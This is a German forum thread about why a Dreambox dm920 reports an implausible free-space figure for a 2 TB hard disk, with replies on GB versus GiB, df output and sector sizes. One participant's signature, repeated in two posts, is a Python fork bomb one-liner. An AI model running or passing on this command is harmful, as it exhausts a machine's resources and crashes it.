Eigenschaften der Festplatte, wer rechnet falsch? (gelöst)

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Eigenschaften der Festplatte, wer rechnet falsch? (gelöst)

      Wer rechtet falsch (siehe Anhang) ?(
      m.E. sind 2 TB ca. 2.048 GB oder 2.097.152 MB
      und nicht 5.219.559 MB, noch dazu "frei", denn die Platte ist ca. halbvoll mit diversen Videos...
      Bilder
      • 161732.png

        328,34 kB, 940×791, 334 mal angesehen

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von snow4fun ()

    • 2 TB Festplatte = 2000 Gigabyte bzw. 1860 Gibibyte, so rechnen zumindest die Festplattenhersteller.

      Da wird also in deinem Screenshot im Prinzip mit zwei verschiedenen Einheiten joungliert, macht das ganze manchmal etwas verwirrend.

      Gib im Terminal mal df oder df -h (h wie human) ein. Da bekommst du mehr info. Aber es kommt immer darauf an was die Definition ist. Hier mal eine Erklärung: de.wikipedia.org/wiki/Byte#Vergleich

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von s0larian ()

    • Selbst das ist aber immernoch Lichtjahre entfernt von freien 5.219.559 MB ?(

      Edit: Danke s0larian, ich weiß wie das berechnet wird. Was ich mich frage ist wie die dm920 das berechnet um auf diesen "Frei"-Wert zu kommen?

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von snow4fun ()

    • snow4fun schrieb:

      Selbst das ist aber immernoch Lichtjahre entfernt von freien 5.219.559 MB ?(

      Edit: Danke s0larian, ich weiß wie das berechnet wird. Was ich mich frage ist wie die dm920 das berechnet um auf diesen "Frei"-Wert zu kommen?
      Meine Vermutung: Der Wert der im Terminal bei df für /dev/sda1 ausgegeben wird mit 1024 multipliziert, und von diesem Wert werden dann die letzten sechs Stellen abgeschnitten.
    • Es ist etwas komplexer Größe(MB) = LBA48 / 1024 * Sectorengröße / 1024 ( hersteller rechnen Größe(MB) = LBA48 / 1000 * Sectorengröße / 1000) was bei dir der fehler ist dürfte klar sein der rechnet mit der standart Sectorengröße 512 aber bei großen platten wird neuerdings 4096 verwendet was dann zu einer 8fachen größe resultiert ich denke da wird der hund begraben sein.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • df führt zu dieser rechnerisch nachvollziehbaren Ausgabe ( df -h übrigens identisch)
      /dev/sda1 1951729064 252652092 1699060588 13% /media/hdd

      Aber egal wie ich sinniere, aus 1699060,588 werden keine 5219559 ;(
      Kann das am Skin liegen, daß der Skinner eine falsche Variable hergenommen hat?

      kati910, klingt logisch, Du warst scheller als meine Frage :)
    • Mach mal telnet auf und poste mal die ausgabe beim befehl cat /sys/block/sda/queue/hw_sector_size
      Unabhänig davon sollte man das bei e2 berücksichtigen wenn man die größe berechnen will aber das müssen die dmm devs machen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !